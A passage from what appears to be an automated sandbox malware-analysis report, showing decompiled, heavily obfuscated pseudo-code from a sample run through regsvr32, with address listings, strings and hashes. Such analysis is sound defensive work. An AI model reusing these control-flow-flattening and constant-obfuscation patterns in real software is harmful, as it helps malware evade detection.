												_v144 = 0x59d2a0;
												_v144 = _v144 * 0x41;
												_v144 = _v144 * 0x54;
												_v144 = _v144 >> 1;
												_v144 = _v144 ^ 0x3defc9a8;
												_v136 = 0xf259e9;
												_v136 = _v136 >> 0xf;
												_v136 = _v136 / _t773;
												_v136 = _v136 ^ 0x000336d7;
												E04F75197(_v116, _v140,  &_v112, _v144, _v136, _t773, _v108);
												_t859 = _t859 + 0x14;
												_t754 =  ==  ? _t854 : 0x10e8f;
												while(1) {
													L1:
													_t667 = 0xfbf49;
													goto L2;
												}
											} else {
												if(_t754 == _t667) {
													_v128 = 0x73d391;
													_v128 = _v128 | 0x06260867;
													_v128 = _v128 >> 2;
													_v128 = _v128 ^ 0x1a187f5a;
													_v128 = _v128 ^ 0x1b8b0aec;
													_v140 = 0x3b764f;
													_v140 = _v140 ^ 0x1e36c288;
													_t775 = 0x5d;
													_v140 = _v140 / _t775;
													_v140 = _v140 << 2;
													_v140 = _v140 ^ 0x0144ba2a;
													_v144 = 0xc8672a;
													_v144 = _v144 << 7;
													_t776 = 0x30;
													_v144 = _v144 / _t776;
													_v144 = _v144 + 0xffffd930;
													_v144 = _v144 ^ 0x021e4917;
													_v132 = 0xf5c2ab;
													_v132 = _v132 ^ 0x068ba2df;
													_v132 = _v132 ^ 0x0670659a;
													_t700 = E04F7D6A7(_v128, _v140, _v144, 0x4f616b8, _v132);
													_v136 = 0xe5f41e;
													_t856 = _t700;
													_v136 = _v136 | 0xc33ed363;
													_t778 = 0x43;
													_v136 = _v136 * 0x59;
													_v136 = _v136 ^ 0x23fd0b6f;
													_v116 = _v136;
													_v128 = 0x17dc8d;
													_v128 = _v128 + 0xffff0698;
													_v128 = _v128 + 0x401d;
													_v128 = _v128 ^ 0x0016db59;
													_v124 = 0x25652b;
													_v124 = _v124 ^ 0x183a4272;
													_v124 = _v124 ^ 0x181eb9f7;
													_v140 = 0xe62f57;
													_t336 =  &_v140; // 0xe62f57
													_v140 =  *_t336 * 0x7d;
													_t338 =  &_v140; // 0xe62f57
													_v140 =  *_t338 * 0x15;
													_v140 = _v140 ^ 0x38407a22;
													_v144 = 0x8b6c65;
													_v144 = _v144 * 0x57;
													_v144 = _v144 + 0xfa9c;
													_v144 = _v144 ^ 0x2e9919aa;
													_v144 = _v144 ^ 0x01fc3240;
													_v136 = 0xb63bef;
													_v136 = _v136 / _t778;
													_v136 = _v136 | 0x6bb793dc;
													_v136 = _v136 ^ 0x6bb4c4b6;
													_v120 = 0xa132b7;
													_v120 = _v120 | 0xfe18e13a;
													_v120 = _v120 ^ 0xfeb35030;
													_v132 = 0x5eff6b;
													_v132 = _v132 + 0xffffcdae;
													_v132 = _v132 ^ 0x005b9749;
													_t710 = E04F6A6E9(_v128, _v124, _v140, _t778,  &_v76, _v144, _v112, _v116, _v136,  &_v116, _v120, _v132, _t700);
													_t863 = _t859 + 0x38;
													if(_t710 != 0) {
														_t754 = 0x884fe;
													} else {
														_v144 = 0x89f026;
														_v144 = _v144 ^ 0xe6d43500;
														_v144 = _v144 + 0xc8ce;
														_v144 = _v144 + 0xffff4eb8;
														_v144 = _v144 ^ 0xe6577694;
														_v136 = 0xb91549;
														_t781 = 0x38;
														_v136 = _v136 / _t781;
														_v136 = _v136 | 0xd6f79219;
														_v136 = _v136 ^ 0xd6f02d0d;
														_v124 = 0x70d030;
														_v124 = _v124 + 0xffff7378;
														_v124 = _v124 ^ 0x007648b4;
														_t782 =  *0x4f8220c; // 0x0
														E04F6C8F0(_t782 + 0x1c, _v144, _v136,  &_v68, 0x40, _v124);
														_t863 = _t863 + 0x10;
														_t754 = 0xb5540;
													}
													_v120 = 0x8d0c15;
													_v120 = _v120 + 0xffffd69d;
													_v120 = _v120 ^ 0x008ba884;
													_v124 = 0x97b488;
													_v124 = _v124 | 0x83baa73b;
													_v124 = _v124 ^ 0x83b0c90d;
													_v136 = 0x91313d;
													_v136 = _v136 >> 0xd;
													_v136 = _v136 >> 5;
													_v136 = _v136 ^ 0x000e09e2;
													_v144 = 0x5e93ce;
													_v144 = _v144 ^ 0x237c9c19;
													_v144 = _v144 + 0x3dcd;
													_v144 = _v144 << 2;
													_v144 = _v144 ^ 0x8c876556;
													E04F6845B(_v120, _v124, _v136, _v144, _t856);
													goto L13;
												}
												goto L34;
											}
										}
									}
								}
								goto L37;
								L34:
							} while (_t754 != 0xc1810);
							goto L37;
						}
					}
				}
			}

0x04f6a9dc
0x04f6a9e4
0x04f6a9e6
0x04f6a9e8
0x04f6a9f0
0x04f6a9f4
0x04f6a9f9
0x04f6aa01
0x04f6aa06
0x04f6aa0a
0x04f6aa0a
0x04f6aa0a
0x04f6aa0f
0x04f6aa0f
0x04f6aa0f
0x04f6aa14
0x04f6aa14
0x04f6aa14
0x04f6aa19
0x04f6aa19
0x04f6aa19
0x04f6aa19
0x04f6aa1b
0x00000000
0x00000000
0x04f6aa21
0x04f6af0d
0x04f6af17
0x04f6af25
0x04f6af28
0x04f6af2c
0x04f6af34
0x04f6af3c
0x04f6af44
0x04f6af49
0x04f6af4e
0x04f6af56
0x04f6af6a
0x04f6af77
0x04f6af7d
0x00000000
0x04f6aa27
0x04f6aa2d
0x04f6b67e
0x04f6b68e
0x04f6b691
0x04f6b695
0x04f6b69a
0x04f6b69f
0x04f6b6a7
0x04f6b6af
0x04f6b6b7
0x04f6b6bf
0x04f6b6c7
0x04f6b6cf
0x04f6b6d7
0x04f6b6ef
0x04f6aa33
0x04f6aa35
0x04f6ae56
0x04f6ae67
0x04f6ae68
0x04f6ae6c
0x04f6ae74
0x04f6ae7c
0x04f6ae8a
0x04f6ae8e
0x04f6ae93
0x04f6ae9b
0x04f6aea8
0x04f6aeb0
0x04f6aece
0x04f6aed3
0x04f6aedd
0x04f6aee5
0x04f6aee8
0x04f6aefb
0x04f6af00
0x04f6af05
0x00000000
0x04f6aa3b
0x04f6aa41
0x04f6adbc
0x04f6adcd
0x04f6add0
0x04f6add9
0x04f6addd
0x04f6ade5
0x04f6aded
0x04f6adf5
0x04f6adfb
0x04f6adfc
0x04f6ae02
0x04f6ae0a
0x04f6ae17
0x04f6ae21
0x04f6ae25
0x04f6ae2d
0x04f6ae45
0x04f6ae4c
0x04f6aa0a
0x04f6aa0a
0x04f6aa0a
0x00000000
0x04f6aa0a
0x04f6aa47
0x04f6aa4d
0x04f6ad6b
0x04f6ad73
0x04f6ad7b
0x04f6ad83
0x04f6ad8b
0x04f6ad93
0x04f6ad98
0x04f6adac
0x04f6adb2
0x04f6aa0a
0x04f6aa0a
0x04f6aa0a
0x04f6aa0f
0x04f6aa0f
0x04f6aa14
0x04f6aa14
0x00000000
0x04f6aa14
0x04f6aa53
0x04f6aa59
0x04f6ad61
0x00000000
0x04f6aa5f
0x04f6aa65
0x04f6aa6b
0x04f6aa78
0x04f6aa7c
0x04f6aa84
0x04f6aa8c
0x04f6aa91
0x04f6aa99
0x04f6aaa1
0x04f6aaa6
0x04f6aaae
0x04f6aab6
0x04f6aabe
0x04f6aadb
0x04f6aae0
0x04f6aaeb
0x04f6aaf2
0x04f6aafa
0x04f6ab02
0x04f6ab0a
0x04f6ab12
0x04f6ab1a
0x04f6ab22
0x04f6ab2a
0x04f6ab32
0x04f6ab3a
0x04f6ab42
0x04f6ab5f
0x04f6ab64
0x04f6ab6f
0x04f6ab79
0x04f6ab83
0x04f6ab8b
0x04f6ab90
0x04f6ab9e
0x04f6aba2
0x04f6aba6
0x04f6abae
0x04f6abb6
0x04f6abc3
0x04f6abc7
0x04f6abcf
0x04f6abd7
0x04f6abdf
0x04f6abec
0x04f6abf0
0x04f6abf8
0x04f6ac16
0x04f6ac1d
0x04f6ac2f
0x04f6ac32
0x04f6ac3a
0x04f6ac3f
0x04f6ac47
0x04f6ac4f
0x04f6ac57
0x04f6ac5f
0x04f6ac64
0x04f6ac6c
0x04f6ac7a
0x04f6ac7e
0x04f6ac86
0x04f6ac8e
0x04f6ac96
0x04f6aca3
0x04f6aca7
0x04f6acbf
0x04f6acc4
0x04f6accc
0x04f6acd5
0x04f6acd9
0x04f6ace1
0x04f6ace9
0x04f6acf1
0x04f6acf9
0x04f6ad01
0x04f6ad09
0x04f6ad16
0x04f6ad1a
0x04f6ad22
0x04f6ad2f
0x04f6ad33
0x04f6ad4b
0x04f6ad50
0x04f6ad54
0x04f6ad54
0x04f6ad57
0x04f6ad57
0x04f6b661
0x04f6b661
0x04f6b666
0x04f6b66b
0x04f6b66b
0x00000000
0x04f6aa65
0x04f6aa59
0x04f6aa4d
0x04f6aa41
0x04f6aa35
0x04f6aa2d
0x04f6b6f9
0x04f6b703
0x04f6b703
0x04f6af8b
0x04f6b60b
0x04f6b61b
0x04f6b61e
0x04f6b622
0x04f6b62a
0x04f6b632
0x04f6b63a
0x04f6b642
0x04f6b656
0x04f6b65c
0x00000000
0x04f6af91
0x04f6af93
0x04f6b5f4
0x04f6b5fb
0x04f6b603
0x00000000
0x04f6af99
0x04f6af9f
0x04f6b38e
0x04f6b398
0x04f6b3a0
0x04f6b3a8
0x04f6b3ad
0x04f6b3b5
0x04f6b3c4
0x04f6b3c5
0x04f6b3c9
0x04f6b3ce
0x04f6b3d6
0x04f6b3de
0x04f6b3eb
0x04f6b3ef
0x04f6b3fd
0x04f6b401
0x04f6b409
0x04f6b411
0x04f6b419
0x04f6b436
0x04f6b43b
0x04f6b445
0x04f6b44d
0x04f6b457
0x04f6b45f
0x04f6b464
0x04f6b46c
0x04f6b474
0x04f6b47c
0x04f6b484
0x04f6b48c
0x04f6b491
0x04f6b499
0x04f6b4a1
0x04f6b4b0
0x04f6b4b1
0x04f6b4ba
0x04f6b4be
0x04f6b4c3
0x04f6b4cb
0x04f6b4d3
0x04f6b4db
0x04f6b4e3
0x04f6b4eb
0x04f6b4f0
0x04f6b4f8
0x04f6b500
0x04f6b50e
0x04f6b516
0x04f6b51a
0x04f6b54b
0x04f6b550
0x04f6b564
0x04f6b56d
0x04f6b571
0x04f6b579
0x04f6b581
0x04f6b589
0x04f6b58e
0x04f6b596
0x04f6b59e
0x04f6b5a6
0x04f6b5ae
0x04f6b5b6
0x04f6b5be
0x04f6b5c6
0x04f6b5cb
0x04f6b5e3
0x04f6b5e8
0x00000000
0x04f6afa5
0x04f6afab
0x04f6b2d1
0x04f6b2db
0x04f6b2e3
0x04f6b2ef
0x04f6b2f3
0x04f6b302
0x04f6b303
0x04f6b30c
0x04f6b310
0x04f6b318
0x04f6b325
0x04f6b32e
0x04f6b332
0x04f6b336
0x04f6b33e
0x04f6b346
0x04f6b351
0x04f6b359
0x04f6b377
0x04f6b37c
0x04f6b386
0x04f6aa0a
0x04f6aa0a
0x04f6aa0a
0x00000000
0x04f6aa0a
0x04f6afb1
0x04f6afb3
0x04f6afb9
0x04f6afc3
0x04f6afcb
0x04f6afd0
0x04f6afd8
0x04f6afe0
0x04f6afe8
0x04f6aff6
0x04f6affb
0x04f6b001
0x04f6b006
0x04f6b00e
0x04f6b016
0x04f6b01f
0x04f6b022
0x04f6b026
0x04f6b02e
0x04f6b036
0x04f6b03e
0x04f6b046
0x04f6b063
0x04f6b068
0x04f6b070
0x04f6b072
0x04f6b083
0x04f6b084
0x04f6b088
0x04f6b094
0x04f6b098
0x04f6b0a0
0x04f6b0a8
0x04f6b0b0
0x04f6b0b8
0x04f6b0c0
0x04f6b0c8
0x04f6b0d0
0x04f6b0d8
0x04f6b0dd
0x04f6b0e1
0x04f6b0e6
0x04f6b0ea
0x04f6b0f2
0x04f6b0ff
0x04f6b103
0x04f6b10b
0x04f6b113
0x04f6b11b
0x04f6b129
0x04f6b131
0x04f6b139
0x04f6b141
0x04f6b149
0x04f6b151
0x04f6b159
0x04f6b161
0x04f6b169
0x04f6b1a0
0x04f6b1a5
0x04f6b1aa
0x04f6b242
0x04f6b1b0
0x04f6b1b0
0x04f6b1ba
0x04f6b1c2
0x04f6b1ca
0x04f6b1d2
0x04f6b1da
0x04f6b1e8
0x04f6b1eb
0x04f6b1f3
0x04f6b1fb
0x04f6b203
0x04f6b20b
0x04f6b213
0x04f6b226
0x04f6b233
0x04f6b238
0x04f6b23b
0x04f6b23b
0x04f6b247
0x04f6b24f
0x04f6b257
0x04f6b25f
0x04f6b267
0x04f6b26f
0x04f6b277
0x04f6b27f
0x04f6b284
0x04f6b289
0x04f6b291
0x04f6b299
0x04f6b2a1
0x04f6b2a9
0x04f6b2ae
0x04f6b2c7
0x00000000
0x04f6b2c7
0x00000000
0x04f6afb3
0x04f6afab
0x04f6af9f
0x04f6af93
0x00000000
0x04f6b670
0x04f6b670
0x00000000
0x04f6b67c
0x04f6aa14
0x04f6aa0f

Strings

Ve(y, xrefs: 04F6AD8B
OMZg, xrefs: 04F6AB3A
*S5, xrefs: 04F6B47C
on, xrefs: 04F6B409
6{, xrefs: 04F6ADF5
,_}G, xrefs: 04F6AD01
4, xrefs: 04F6A9E8
Ee, xrefs: 04F6B62A
+e%, xrefs: 04F6B0B8

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$*S5$+e%$,_}G$6{$Ee$OMZg$Ve(y$on
API String ID: 0-1366749859
Opcode ID: 60e3f53e681130b6b0a011d8b200d3feb8a81f5ff18043437d524bbc88fcb1e6
Instruction ID: 5d7abf9f88af3607e09b335be41eae283393e699835614656e9c60fd42de9b86
Opcode Fuzzy Hash: 60e3f53e681130b6b0a011d8b200d3feb8a81f5ff18043437d524bbc88fcb1e6
Instruction Fuzzy Hash: 9E7201715093429FC348CF25D58A80BBBE1BBC8758F104A1DF5CAA6260D7B5DA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F7CBE5 Relevance: 9.3, Strings: 7, Instructions: 518
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E04F7CBE5(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _t514;
				void* _t516;
				signed int _t526;
				void* _t527;
				void* _t531;
				signed int _t534;
				signed int _t546;
				signed int _t554;
				signed int _t557;
				void* _t561;
				signed int _t566;
				void* _t577;
				intOrPtr _t583;
				signed int _t584;
				signed int _t585;
				signed int _t591;
				signed int _t593;
				signed int _t597;
				signed int _t600;
				signed int _t602;
				signed int _t603;
				signed int _t605;
				signed int _t606;
				signed int _t610;
				signed int _t612;
				void* _t623;
				void* _t633;
				void* _t657;
				void* _t659;
				signed int _t660;
				intOrPtr _t663;
				signed int* _t665;
				signed int* _t668;
				void* _t673;

				_t583 = __ecx;
				_push(_a20);
				_v56 = __ecx;
				_push(_a16);
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t514);
				_t665 =  &(( &_v64)[7]);
				_v16 = 0x61b13;
				_t663 = 0;
				_v12 = 0x89a4d;
				_v8 = 0x8c9fe;
				_t577 = 0xaf7ce;
				_v4 = 0;
				_t657 = 0xad265;
				while(1) {
					L1:
					_t659 = 0xf10be;
					while(1) {
						_t516 = 0x2f082;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t673 = _t577 - _t657;
									if(_t673 <= 0) {
										break;
									}
									__eflags = _t577 - 0xaf7ce;
									if(_t577 == 0xaf7ce) {
										_t577 = 0x3c4d8;
										goto L26;
									} else {
										__eflags = _t577 - 0xc0557;
										if(__eflags == 0) {
											_v44 = 0x91f50;
											_t597 = 0x4c;
											_push(_t597);
											_v44 = _v44 / _t597;
											_v44 = _v44 ^ 0x00046ec8;
											_v40 = 0x921235;
											_v40 = _v40 >> 0xb;
											_v40 = _v40 ^ 0x0004cb93;
											_t546 = E04F73EE6(_t597, _v20, __eflags);
											__eflags = _t546;
											_v24 = _t546;
											_t583 = _v56;
											_t633 = 0x42d3a;
											_t516 = 0x2f082;
											_t577 =  !=  ? 0x42d3a : 0xccdf1;
											continue;
										} else {
											__eflags = _t577 - 0xccdf1;
											if(_t577 == 0xccdf1) {
												_v60 = 0x9c86e;
												_v60 = _v60 ^ 0x67ccab4c;
												_v60 = _v60 | 0xb54f46b4;
												_v60 = _v60 + 0x22a2;
												_v60 = _v60 ^ 0xf7c19320;
												_v48 = 0xa35a43;
												_t610 = 0x13;
												_v48 = _v48 * 0x12;
												_v48 = _v48 * 0x3b;
												_v48 = _v48 ^ 0xa5ae3115;
												_v44 = 0x26b017;
												_v44 = _v44 << 0xc;
												_v44 = _v44 / _t610;
												_t508 =  &_v44;
												 *_t508 = _v44 ^ 0x05a6da39;
												__eflags =  *_t508;
												E04F75C41(_v60, _v32, _v48, _v44);
											} else {
												__eflags = _t577 - _t659;
												if(_t577 != _t659) {
													goto L26;
												} else {
													_v40 = 0x7b8ae7;
													_v40 = _v40 >> 5;
													_v40 = _v40 ^ 0x000030ae;
													_v64 = 0x473a5f;
													_v64 = _v64 ^ 0x4fd9bab1;
													_v64 = _v64 | 0x75d7e27c;
													_v64 = _v64 ^ 0x7fd0e524;
													_v60 = 0xcaccb8;
													_t612 = 0x58;
													_v60 = _v60 / _t612;
													_v60 = _v60 + 0xaba6;
													_v60 = _v60 >> 0xb;
													_v60 = _v60 ^ 0x000fa156;
													_t554 = E04F62557(_v40, _a8, _t612, _v64, _v36, _a4, _v60);
													_t583 = _v56;
													_t665 =  &(_t665[5]);
													__eflags = _t554;
													_t516 = 0x2f082;
													_t577 =  ==  ? 0x2f082 : _t657;
													L3:
													continue;
												}
											}
										}
									}
									L29:
									return _t663;
								}
								if(_t673 == 0) {
									_v64 = 0x292c6;
									_v64 = _v64 << 8;
									_v64 = _v64 << 9;
									_v64 = _v64 + 0xffff0a76;
									_v64 = _v64 ^ 0x25836e26;
									_v40 = 0xa1e69f;
									_v40 = _v40 ^ 0x8c6de25e;
									_v40 = _v40 ^ 0x8ccc4b01;
									_v44 = 0x7cbab4;
									_t584 = 0x60;
									_v44 = _v44 / _t584;
									_v44 = _v44 ^ 0xd13127bd;
									_v44 = _v44 ^ 0xd13f4ce9;
									_v60 = 0xd02fe5;
									_t585 = 7;
									_v60 = _v60 / _t585;
									_v60 = _v60 * 0x64;
									_v60 = _v60 * 0x75;
									_v60 = _v60 ^ 0x4f4183cc;
									E04F7F601(_v64, _v36, _v40, _v44, _v60);
									_t665 =  &(_t665[3]);
									_t577 = 0x89204;
									goto L12;
								} else {
									if(_t577 == _t516) {
										_v48 = 0x739c37;
										_v48 = _v48 >> 0x10;
										_v48 = _v48 | 0x28877e5e;
										_v48 = _v48 ^ 0x288f8f67;
										_v44 = 0x2dfc66;
										_t660 = 0x3c;
										_v44 = _v44 / _t660;
										_v44 = _v44 >> 3;
										_v44 = _v44 ^ 0x000db7f0;
										_v40 = 0xbe7ab;
										_v40 = _v40 ^ 0x94ad4604;
										_v40 = _v40 ^ 0x94a80dc9;
										_push(_v40);
										_push(_t583);
										_push(_t583);
										_push(_v44);
										_push(_v48);
										_t623 = 0x20;
										_t526 = E04F6FDC5(_v36, _t623);
										_t665 =  &(_t665[5]);
										_t577 = _t657;
										__eflags = _t526;
										_t663 =  ==  ? 1 : _t663;
										_t583 = _v56;
										goto L1;
									} else {
										if(_t577 == 0x3c4d8) {
											_v48 = 0x73dfb7;
											_v48 = _v48 + 0xffff2002;
											_v48 = _v48 ^ 0x00795ad0;
											_v64 = 0x7c6c34;
											_v64 = _v64 | 0x508f937c;
											_v64 = _v64 ^ 0xce9823aa;
											_v64 = _v64 + 0x3298;
											_v64 = _v64 ^ 0x9e69847a;
											_v40 = 0xb93fff;
											_v40 = _v40 + 0xd9c5;
											_v40 = _v40 ^ 0x00bb7e43;
											_v44 = 0xffde11;
											_v44 = _v44 + 0x619e;
											_v44 = _v44 | 0x3fb8aebb;
											_v44 = _v44 ^ 0x3fbe7e0d;
											_t527 = E04F7D6A7(_v48, _v64, _v40, 0x4f61718, _v44);
											_v48 = 0x67fbb;
											_v48 = _v48 + 0xb312;
											_v48 = _v48 ^ 0x0f73a7e6;
											_v48 = _v48 ^ 0x0f7b00a4;
											_v44 = 0xaaf465;
											_v44 = _v44 | 0x6b211096;
											_v44 = _v44 + 0x9ece;
											_v44 = _v44 ^ 0x6bac8af7;
											_v60 = 0xd1973e;
											_v60 = _v60 | 0x9e63dd36;
											_v60 = _v60 + 0xec2b;
											_v60 = _v60 | 0xaff63914;
											_v60 = _v60 ^ 0xbff60fe2;
											_v64 = 0x458b58;
											_t591 = 0xa;
											_v64 = _v64 * 0xc;
											_v64 = _v64 / _t591;
											_v64 = _v64 << 8;
											_v64 = _v64 ^ 0x53751c9b;
											_t531 = E04F7D6A7(_v48, _v44, _v60, 0x4f61678, _v64);
											_v52 = 0x2d1543;
											_v52 = _v52 + 0xffff2a67;
											_v52 = _v52 ^ 0x00203522;
											_v48 = 0xe1f4d3;
											_v48 = _v48 + 0x7d7f;
											_v48 = _v48 ^ 0x00e622a7;
											_v44 = 0xec2e03;
											_v44 = _v44 + 0xd7e1;
											_v44 = _v44 ^ 0x00e19faf;
											_v40 = 0xefeac7;
											_t593 = 0x5b;
											_v40 = _v40 / _t593;
											_v40 = _v40 ^ 0x00038257;
											_t534 = E04F62D6F( &_v32, _v52, _v48, _v44, _t527, _t593, _v40, _t531);
											_v44 = 0x2cc3ac;
											__eflags = _t534;
											_t577 =  ==  ? 0x78384 : 0xa0053;
											_v44 = _v44 + 0xffff3f58;
											_v44 = _v44 + 0xa9f;
											_v44 = _v44 ^ 0x002b7bb2;
											_v48 = 0x64340b;
											_v48 = _v48 >> 2;
											_v48 = _v48 ^ 0x00125f57;
											_v40 = 0xf9a66f;
											_v40 = _v40 + 0xd536;
											_v40 = _v40 ^ 0x00f9df38;
											_v60 = 0xca8ec6;
											_v60 = _v60 | 0xac49bca3;
											_v60 = _v60 * 0x1c;
											_v60 = _v60 + 0x17dd;
											_v60 = _v60 ^ 0xe64957ce;
											E04F6845B(_v44, _v48, _v40, _v60, _t527);
											_v48 = 0x5030d6;
											_t668 =  &(_t665[0xf]);
											_v48 = _v48 * 0x6b;
											_v48 = _v48 ^ 0xaa822acb;
											_v48 = _v48 ^ 0x8b0463e2;
											_v44 = 0xfe63a8;
											_v44 = _v44 * 0x56;
											_v44 = _v44 ^ 0x3b0e626f;
											_v44 = _v44 ^ 0x6e7d2294;
											_v52 = 0x49dfb0;
											_v52 = _v52 + 0xc6d6;
											_v52 = _v52 ^ 0x0047cee2;
											_v40 = 0xb3028e;
											_v40 = _v40 << 1;
											_v40 = _v40 ^ 0x016b794f;
											E04F6845B(_v48, _v44, _v52, _v40, _t531);
											_t657 = 0xad265;
											goto L14;
										} else {
											if(_t577 == _t633) {
												_v44 = 0x7dba5c;
												_v44 = _v44 | 0x0a577b8e;
												_v44 = _v44 << 0xb;
												_v44 = _v44 ^ 0xffd49d30;
												_v64 = 0x41696c;
												_v64 = _v64 | 0x0c183591;
												_v64 = _v64 * 0x17;
												_v64 = _v64 + 0x94d2;
												_v64 = _v64 ^ 0x1c09db12;
												_v48 = 0x5d34b9;
												_v48 = _v48 + 0xfffff4b1;
												_v48 = _v48 >> 5;
												_v48 = _v48 ^ 0x000ded5d;
												_v60 = 0xa4bb34;
												_v60 = _v60 << 6;
												_v60 = _v60 + 0xeb31;
												_v60 = _v60 ^ 0x29201d09;
												_v40 = 0x594654;
												_v40 = _v40 * 0x75;
												_v40 = _v40 ^ 0x28ce1ab7;
												_v52 = 0x321208;
												_v52 = _v52 >> 0xa;
												_v52 = _v52 + 0x65a5;
												_v52 = _v52 ^ 0x0001fa3f;
												_t557 = E04F75265(_v20,  &_v36, _v44, _v64, _v24, _v48, _v60, _v40, _v32, _v52);
												_t665 = _t665 - 0xc + 0x2c;
												__eflags = _t557;
												_t577 =  ==  ? _t659 : 0x89204;
												goto L12;
											} else {
												if(_t577 == 0x78384) {
													_v60 = 0xef3c73;
													_v60 = _v60 + 0xfffffde1;
													_t600 = 0x58;
													_v60 = _v60 * 0x69;
													_v60 = _v60 ^ 0x62112642;
													_v52 = 0x4c37ed;
													_t50 =  &_v52; // 0x4c37ed
													_v52 =  *_t50 / _t600;
													_v52 = _v52 ^ 0x000cdb22;
													_v48 = 0x354803;
													_v48 = _v48 + 0x607d;
													_v48 = _v48 ^ 0x00351e6e;
													_v44 = 0xc0b0ea;
													_v44 = _v44 >> 3;
													_v44 = _v44 ^ 0x00181e63;
													_t561 = E04F7D6A7(_v60, _v52, _v48, 0x4f616e8, _v44);
													_v52 = 0xa43b23;
													_v52 = _v52 ^ 0x7b055795;
													_v52 = _v52 | 0x8669abbc;
													_v52 = _v52 ^ 0xffe279c1;
													_v60 = 0xb589db;
													_v60 = _v60 | 0xb33b7ecd;
													_v60 = _v60 << 0xa;
													_v60 = _v60 ^ 0xfff52a6c;
													_v48 = 0x64f468;
													_t602 = 0x6c;
													_v48 = _v48 * 0x16;
													_v48 = _v48 ^ 0x08a885cc;
													_v64 = 0x559443;
													_v64 = _v64 + 0xffff1d96;
													_v64 = _v64 << 0xd;
													_v64 = _v64 ^ 0x04c67370;
													_v64 = _v64 ^ 0x92ff85bb;
													_v44 = 0xaaa420;
													_v44 = _v44 / _t602;
													_v44 = _v44 ^ 0x00027451;
													_t566 = E04F6E7F8(_t602,  &_v20, _t561, _v32, _v52, _v60, _v48,  &_v28, _v64, _v44);
													_v48 = 0x9bf305;
													_t668 =  &(_t665[0xb]);
													__eflags = _t566;
													_t577 =  ==  ? 0xc0557 : 0xccdf1;
													_v48 = _v48 + 0xffff521e;
													_v48 = _v48 ^ 0x0090f9d3;
													_v44 = 0xcead88;
													_t603 = 0x21;
													_v44 = _v44 / _t603;
													_v44 = _v44 ^ 0x0001e851;
													_v52 = 0x426534;
													_v52 = _v52 ^ 0x2ca5d571;
													_v52 = _v52 | 0x0c416ed0;
													_v52 = _v52 ^ 0x2ce140b9;
													_v64 = 0x65f4f3;
													_v64 = _v64 ^ 0xa0bc2a6b;
													_v64 = _v64 * 0x6a;
													_v64 = _v64 << 0xe;
													_t145 =  &_v64;
													 *_t145 = _v64 ^ 0x8ab75288;
													__eflags =  *_t145;
													E04F6845B(_v48, _v44, _v52, _v64, _t561);
													L14:
													_t583 = _v56;
													_t665 =  &(_t668[3]);
													_t659 = 0xf10be;
													_t516 = 0x2f082;
													_t633 = 0x42d3a;
													goto L26;
												} else {
													if(_t577 != 0x89204) {
														goto L26;
													} else {
														_v48 = 0x594698;
														_v48 = _v48 | 0xdbf1abb4;
														_v48 = _v48 ^ 0xdbf53dce;
														_v64 = 0xaf0f6c;
														_t605 = 0x32;
														_v64 = _v64 / _t605;
														_t606 = 0xa;
														_v64 = _v64 / _t606;
														_v64 = _v64 | 0xb18e44f3;
														_v64 = _v64 ^ 0xb18c3177;
														_v44 = 0xf6565b;
														_v44 = _v44 >> 0xf;
														_v44 = _v44 ^ 0x00036e6c;
														E04F7E4B2(_v48, _v64, _v44, _v44, _v24);
														_t577 = 0xccdf1;
														L12:
														_t583 = _v56;
														_t516 = 0x2f082;
														goto L3;
													}
												}
											}
										}
									}
								}
								goto L29;
								L26:
								__eflags = _t577 - 0xa0053;
							} while (__eflags != 0);
							goto L29;
						}
					}
				}
			}

0x04f7cbe5
0x04f7cbec
0x04f7cbf0
0x04f7cbf4
0x04f7cbf8
0x04f7cbfa
0x04f7cbfe
0x04f7cc02
0x04f7cc03
0x04f7cc04
0x04f7cc09
0x04f7cc0c
0x04f7cc14
0x04f7cc16
0x04f7cc1e
0x04f7cc26
0x04f7cc2b
0x04f7cc2f
0x04f7cc34
0x04f7cc34
0x04f7cc34
0x04f7cc39
0x04f7cc39
0x04f7cc3e
0x04f7cc3e
0x04f7cc43
0x04f7cc43
0x04f7cc43
0x04f7cc43
0x04f7cc45
0x00000000
0x00000000
0x04f7d44d
0x04f7d453
0x04f7d578
0x00000000
0x04f7d459
0x04f7d459
0x04f7d45f
0x04f7d510
0x04f7d520
0x04f7d523
0x04f7d524
0x04f7d528
0x04f7d530
0x04f7d538
0x04f7d53d
0x04f7d551
0x04f7d556
0x04f7d558
0x04f7d55d
0x04f7d566
0x04f7d56b
0x04f7d570
0x00000000
0x04f7d465
0x04f7d465
0x04f7d46b
0x04f7d58e
0x04f7d598
0x04f7d5a0
0x04f7d5a8
0x04f7d5b0
0x04f7d5b8
0x04f7d5c7
0x04f7d5c8
0x04f7d5d1
0x04f7d5d5
0x04f7d5dd
0x04f7d5e5
0x04f7d5f0
0x04f7d5f4
0x04f7d5f4
0x04f7d5f4
0x04f7d60c
0x04f7d471
0x04f7d471
0x04f7d473
0x00000000
0x04f7d479
0x04f7d479
0x04f7d483
0x04f7d488
0x04f7d490
0x04f7d498
0x04f7d4a0
0x04f7d4a8
0x04f7d4b0
0x04f7d4be
0x04f7d4c5
0x04f7d4c9
0x04f7d4d1
0x04f7d4d6
0x04f7d4f3
0x04f7d4f8
0x04f7d4fc
0x04f7d4ff
0x04f7d503
0x04f7d508
0x04f7cc3e
0x00000000
0x04f7cc3e
0x04f7d473
0x04f7d46b
0x04f7d45f
0x04f7d616
0x04f7d61d
0x04f7d61d
0x04f7cc4b
0x04f7d395
0x04f7d39f
